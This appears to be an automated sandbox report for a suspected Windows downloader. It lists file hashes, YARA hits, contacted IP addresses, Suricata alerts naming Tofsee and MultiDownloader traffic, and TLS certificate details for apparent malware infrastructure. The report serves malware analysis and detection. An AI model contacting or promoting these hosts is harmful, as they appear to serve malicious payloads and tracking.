Summary | ZeroBOX

ww_testLL_0211_single.exe

Gen1, Generic Malware, UPX, ASPack, Malicious Library, Malicious Packer, PE64, PE File, OS Processor Check, PE32, .NET EXE, DLL
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 4, 2021, 2:43 p.m. Nov. 4, 2021, 3:05 p.m.
Size 172.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 8ac9ae1dd3a33406003c4456359a9db4
SHA256 7890f85114dba72bfafa6dd4cca59d2ac030458e32136c3a5ce992469cc353bc
CRC32 72EDE583
ssdeep 3072:DRt67jtKBIKViaBNa1wK9BOomGbV3gWph+l5/yyvcOGkXthDBzBAXL+laxX19551:+kBKia6QBOaV3PgNyyvcOGkXTDBzySlP
Yara
  • PE_Header_Zero - PE File Signature
  • OS_Processor_Check_Zero - OS Processor Check
  • IsPE32 - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file

IP Address Status Action
104.21.72.228 Active Moloch
104.244.42.65 Active Moloch
121.254.136.27 Active Moloch
149.154.167.99 Active Moloch
162.159.133.233 Active Moloch
164.124.101.2 Active Moloch
172.67.185.110 Active Moloch
172.67.204.112 Active Moloch
194.163.158.120 Active Moloch
199.192.17.247 Active Moloch
208.95.112.1 Active Moloch
212.192.241.62 Active Moloch
23.32.56.144 Active Moloch
34.117.59.81 Active Moloch
45.133.1.107 Active Moloch
45.133.1.182 Active Moloch
45.136.113.13 Active Moloch
45.136.151.102 Active Moloch
45.142.182.152 Active Moloch
5.255.255.5 Active Moloch
5.8.76.205 Active Moloch
52.219.66.59 Active Moloch
88.99.66.31 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49165 -> 162.159.133.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49165 -> 162.159.133.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49166 -> 162.159.133.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49168 -> 162.159.133.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49164 -> 162.159.133.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49164 -> 162.159.133.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49162 -> 212.192.241.62:80 2034192 ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin A Network Trojan was detected
TCP 192.168.56.103:49162 -> 212.192.241.62:80 2034192 ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin A Network Trojan was detected
TCP 192.168.56.103:49174 -> 162.159.133.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49176 -> 162.159.133.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49174 -> 162.159.133.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49176 -> 162.159.133.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49175 -> 162.159.133.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49175 -> 162.159.133.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49180 -> 162.159.133.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49177 -> 162.159.133.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49177 -> 162.159.133.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49181 -> 162.159.133.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 45.133.1.107:80 -> 192.168.56.103:49171 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.133.1.107:80 -> 192.168.56.103:49171 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49183 -> 162.159.133.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 149.154.167.99:443 -> 192.168.56.103:49187 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49190 -> 5.255.255.5:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49195 -> 88.99.66.31:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49199 -> 162.159.133.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 162.159.133.233:80 -> 192.168.56.103:49199 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49192 -> 212.192.241.62:80 2034202 ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2 A Network Trojan was detected
TCP 192.168.56.103:49209 -> 162.159.133.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49209 -> 162.159.133.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49185 -> 149.154.167.99:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49197 -> 88.99.66.31:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49200 -> 162.159.133.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49212 -> 162.159.133.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49213 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49213 -> 34.117.59.81:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.117.59.81:443 -> 192.168.56.103:49213 2025330 ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49170 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49170 -> 34.117.59.81:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49207 -> 212.192.241.62:80 2034192 ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin A Network Trojan was detected
TCP 34.117.59.81:443 -> 192.168.56.103:49170 2025330 ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49207 -> 212.192.241.62:80 2034192 ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin A Network Trojan was detected
TCP 192.168.56.103:49188 -> 104.244.42.65:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49194 -> 212.192.241.62:80 2034192 ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin A Network Trojan was detected
TCP 192.168.56.103:49194 -> 212.192.241.62:80 2034192 ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin A Network Trojan was detected
TCP 192.168.56.103:49219 -> 162.159.133.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49178 -> 162.159.133.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49216 -> 212.192.241.62:80 2034192 ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin A Network Trojan was detected
TCP 192.168.56.103:49173 -> 212.192.241.62:80 2034192 ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin A Network Trojan was detected
TCP 192.168.56.103:49233 -> 104.21.72.228:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49202 -> 162.159.133.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49193 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49193 -> 34.117.59.81:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.117.59.81:443 -> 192.168.56.103:49193 2025330 ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) Device Retrieving External IP Address Detected
TCP 45.136.113.13:80 -> 192.168.56.103:49220 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.103:49198 -> 162.159.133.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49198 -> 162.159.133.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49218 -> 162.159.133.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 162.159.133.233:80 -> 192.168.56.103:49218 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49226 -> 172.67.185.110:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49226 -> 172.67.185.110:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 45.142.182.152:443 -> 192.168.56.103:49238 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49243 -> 45.142.182.152:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49222 -> 172.67.185.110:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49222 -> 172.67.185.110:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49245 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49251 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49254 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49258 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49234 -> 45.142.182.152:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49256 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49262 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 5.8.76.205:80 -> 192.168.56.103:49235 2014819 ET INFO Packed Executable Download Misc activity
TCP 192.168.56.103:49270 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49227 -> 52.219.66.59:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49271 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 5.8.76.205:80 -> 192.168.56.103:49235 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.103:49278 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49273 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49283 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49268 -> 52.219.66.59:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49298 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49292 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49300 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49237 -> 45.142.182.152:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49297 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49304 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49208 -> 162.159.133.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49208 -> 162.159.133.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49210 -> 162.159.133.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49305 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49308 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49224 -> 162.159.133.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 45.133.1.107:80 -> 192.168.56.103:49214 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.133.1.107:80 -> 192.168.56.103:49214 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49317 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 45.142.182.152:443 -> 192.168.56.103:49249 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49253 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49257 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49269 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49274 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49232 -> 172.67.185.110:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49284 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49286 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49289 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49217 -> 162.159.133.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 162.159.133.233:80 -> 192.168.56.103:49217 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49229 -> 172.67.185.110:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49299 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49301 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49255 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49306 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49261 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49264 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49315 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49275 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49279 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49259 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49280 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 199.192.17.247:80 -> 192.168.56.103:49320 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.103:49281 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49282 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49291 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49263 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49293 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49295 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49266 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49302 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49307 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49309 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49272 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49321 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49323 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49324 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49277 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49285 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49288 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49294 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49303 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49248 -> 208.95.112.1:80 2022082 ET POLICY External IP Lookup ip-api.com Device Retrieving External IP Address Detected
TCP 192.168.56.103:49247 -> 45.142.182.152:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49260 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49265 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49267 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49310 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49276 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49312 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49287 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49296 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49313 -> 52.219.66.59:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49325 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49314 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49326 -> 172.67.204.112:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1 192.168.56.103:49168 -> 162.159.133.233:443 C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49181 -> 162.159.133.233:443 C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49183 -> 162.159.133.233:443 None None None
TLSv1 192.168.56.103:49190 -> 5.255.255.5:443 C=RU, O=Yandex LLC, OU=Yandex Certification Authority, CN=Yandex CA C=RU, L=Moscow, OU=ITO, O=Yandex LLC, CN=*.yandex.az 2b:13:52:0c:b0:c6:8c:c9:e3:05:6e:11:91:74:4d:65:ce:3a:64:29
TLSv1 192.168.56.103:49195 -> 88.99.66.31:443 C=US, O=Let's Encrypt, CN=R3 CN=iplogger.com 92:14:16:9c:56:a1:f2:6a:b9:1d:e1:8d:4c:5f:a4:57:a7:9c:a0:6b
TLSv1 192.168.56.103:49197 -> 88.99.66.31:443 C=US, O=Let's Encrypt, CN=R3 CN=iplogger.com 92:14:16:9c:56:a1:f2:6a:b9:1d:e1:8d:4c:5f:a4:57:a7:9c:a0:6b
TLSv1 192.168.56.103:49212 -> 162.159.133.233:443 C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49213 -> 34.117.59.81:443 C=US, O=Google Trust Services LLC, CN=GTS CA 1D4 CN=ipinfo.io f0:42:a0:3b:5b:a8:0e:51:f4:13:25:f7:fc:7c:dc:35:63:19:75:63
TLSv1 192.168.56.103:49170 -> 34.117.59.81:443 C=US, O=Google Trust Services LLC, CN=GTS CA 1D4 CN=ipinfo.io f0:42:a0:3b:5b:a8:0e:51:f4:13:25:f7:fc:7c:dc:35:63:19:75:63
TLSv1 192.168.56.103:49233 -> 104.21.72.228:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamef.com 5c:36:e8:6e:6d:65:76:95:76:a5:7d:b3:47:fe:54:fe:f3:71:15:1b
TLSv1 192.168.56.103:49202 -> 162.159.133.233:443 C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49193 -> 34.117.59.81:443 C=US, O=Google Trust Services LLC, CN=GTS CA 1D4 CN=ipinfo.io f0:42:a0:3b:5b:a8:0e:51:f4:13:25:f7:fc:7c:dc:35:63:19:75:63
TLSv1 192.168.56.103:49245 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49251 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49258 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49254 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49256 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49262 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49270 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49271 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49278 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49273 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49283 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49298 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49292 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49300 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49297 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
